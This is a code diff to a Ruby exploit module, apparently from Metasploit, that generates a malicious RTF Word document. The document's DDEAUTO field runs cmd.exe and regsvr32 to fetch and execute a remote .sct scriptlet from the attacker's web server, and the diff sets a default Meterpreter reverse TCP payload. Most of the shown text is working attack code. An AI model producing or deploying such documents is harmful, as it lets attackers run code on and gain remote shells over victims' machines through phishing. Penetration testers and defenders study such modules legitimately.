@@ -17,8 +17,8 @@ def initialize(info = {})
17
17
'Name' => 'Microsoft Office DDE Payload Delivery' ,
18
18
'Description' => %q{
19
19
This module generates an DDE command to place within
20
- a word document, that when executed, will retrieve a payload
21
- from the webserver
20
+ a word document, that when executed, will retrieve a HTA payload
21
+ via HTTP from an web server.
22
22
} ,
23
23
'Author' => 'mumbai' ,
24
24
'License' => MSF_LICENSE ,
@@ -35,6 +35,14 @@ def initialize(info = {})
35
35
[ 'Microsoft Office' , { } ] ,
36
36
] ,
37
37
'DefaultTarget' => 0 ,
38
+ 'Payload' => {
39
+ 'DisableNops' => true
40
+ } ,
41
+ 'DefaultOptions' => {
42
+ 'DisablePayloadHandler' => false ,
43
+ 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' ,
44
+ 'EXITFUNC' => 'thread'
45
+ }
38
46
) )
39
47
register_options ( [
40
48
OptString . new ( "FILENAME" , [ true , "Filename to save as, or inject" , "msf.rtf" ] ) ,
@@ -138,7 +146,7 @@ def create_rtf
138
146
#
139
147
header = retrieve_header ( datastore [ 'FILENAME' ] )
140
148
field_class = '{\field{\*\fldinst {\rtlch\fcs1 \af31507 \ltrch\fcs0 \insrsid3807165 '
141
- field_class << "DDEAUTO \" C:\\ \\ \\ \\ Programs\\ \\ \\ \\ Microsoft\\ \\ \\ \\ Office\\ \\ \\ \\ MSword.exe\\ \\ \\ \\ ..\\ \\ \\ \\ ..\\ \\ \\ \\ ..\\ \\ \\ \\ ..\\ \\ \\ \\ Windows\\ \\ \\ \\ System32\\ \\ \\ \\ cmd.exe /c regsvr32 /s /n /u /i:#{ get_uri } .sct scrobj.dll\" \" #{ datastore [ 'MESSAGE' ] } \" }}"
149
+ field_class << "DDEAUTO C:\\ \\ \\ \\ Programs\\ \\ \\ \\ Microsoft\\ \\ \\ \\ Office\\ \\ \\ \\ MSword.exe\\ \\ \\ \\ ..\\ \\ \\ \\ ..\\ \\ \\ \\ ..\\ \\ \\ \\ ..\\ \\ \\ \\ Windows\\ \\ \\ \\ System32\\ \\ \\ \\ cmd.exe \" /c regsvr32 /s /n /u /i:#{ get_uri } .sct scrobj.dll\" }}"
142
150
field_class << '{\fldrslt }}\sectd \ltrsect\linex0\endnhere\sectlinegrid360\sectdefaultcl\sftnbj {\rtlch\fcs1 \af31507 \ltrch\fcs0' + "\n "
143
151
field_class << '\insrsid5790315' + "\n "
144
152
field_class << '\par }'
0 commit comments